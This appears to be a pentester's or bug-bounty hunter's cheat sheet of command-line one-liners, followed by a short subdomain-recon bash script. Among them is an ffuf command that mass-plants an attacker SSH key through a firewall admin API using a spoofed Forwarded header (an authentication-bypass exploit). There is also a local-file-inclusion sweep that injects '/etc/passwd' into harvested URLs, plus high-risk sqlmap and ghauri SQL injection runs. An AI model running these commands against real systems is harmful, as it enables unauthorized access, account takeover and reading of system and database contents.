Nuclei Command
~ > nuclei -a ransomsec -target /tmp/dangerous-shell.sh
~ > nuclei -l ./targets.txt -t ./CVE-2022-35405.yaml


FFUF Command
~ > ffuf -u https://codingo.io/FUZZ -w ./wordlist -recursion -e .bak
~ > ffuf -u https://rendering-prd.redacted.com/FUZZ -w english-words.txt -mc all -fw 6
~ > ffuf -w "host_list.txt:URL" -u "https://URL/api/v2/cmdb/system/admin/admin" -x PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000;' -d '{"ssh-public-key1" "h4x0r"}' -mr "SSH" -r -x http://127.0.0.1:8080

Ghauri Command
~ > ghauri -r sqli-req.txt --dbms=MySQL --technique=T --current-db

SQLMAP Command
~ > sqlmap -r sqli-req.txt --current-db --technique=T --dbms=MySQL --level=2 --risk=3 --random-agent --no-cast

HTTPX Command
~ > cat domains.txt | httpx -path wordlist.txt -fc 400,403,404

# Noobtip Find Subdomains via @owasp amass and performa quick scan of all discovered subdomains via NMAP.
~ > amass db -show -d TARGET 2>/dev/null | grep TARGET | while read HOST; do nmap -sC -v -Pn $HOST; done

Local File Inclusion : by @dwisiswant0
~ > gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -C 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'



-------------------------------------------------------------------------------------
# ReconOne # 1

#!/bin/bash
# $1 => example.domain

amass enum --passive -d $1 -o domains_$1
assetfinder --subs-only $1 | tee -a domains_$1

subfinder -d $1 -o domains_subfinder_$1
cat domains_subfinder_$1 | tee -a domain_$1

# filtering the domains
sort -u domains_$1 -o domains_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt
----------------------------------------------------------------------------------------




